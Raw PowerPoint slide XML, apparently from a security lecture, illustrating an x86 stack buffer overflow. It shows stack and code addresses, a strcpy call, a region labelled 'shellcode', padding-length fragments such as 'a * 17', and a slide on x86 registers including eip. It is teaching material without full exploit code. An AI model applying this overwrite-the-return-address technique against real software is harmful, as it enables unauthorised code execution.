                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483fe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048403</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048406</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048409</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048412</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048415</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048420</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>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0xbffff678</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121979" y="1729012"/>
            <a:ext cx="278606" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="635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solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff63c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff640</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff646</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4764988" y="333495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Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="2279172"/>
            <a:ext cx="2831284" cy="457048"/>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shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="1765142"/>
            <a:ext cx="2831284" cy="51403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 * 17</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1441940445"/>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff714</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff646</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff861</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff646</a:t>
                      </a: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229</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="49075" y="35704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0xbffff67c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1764126894"/>
              </p:ext>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0xa</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0xbffff63c</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0xbffff678</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>804841f</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80482d0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483fd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483fe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048403</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048406</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048409</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048412</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048415</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048420</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>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0xbffff678</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121979" y="1729012"/>
            <a:ext cx="278606" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="635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solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff63c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff640</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff646</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4777227" y="358476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Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="2279172"/>
            <a:ext cx="2831284" cy="457048"/>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shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="1765142"/>
            <a:ext cx="2831284" cy="51403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a * 29</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1363587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4" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>x86 Registers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1011715" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Segment registers: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, ds, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>es</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used to select segments (e.g., code, data, stack)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Program status and control: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eflags</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The instruction pointer: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Points to the next instruction to be executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cannot be read or set explicitly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is modified by jump and call/return instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be read by executing a call and checking the value pushed on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Floating point units and mmx/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xmm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="60310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17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17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17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117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117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117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1171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1171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117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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff714</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff646</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff861</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff646</a:t>
                      </a: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230</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="61763" y="13740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0xbffff67c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
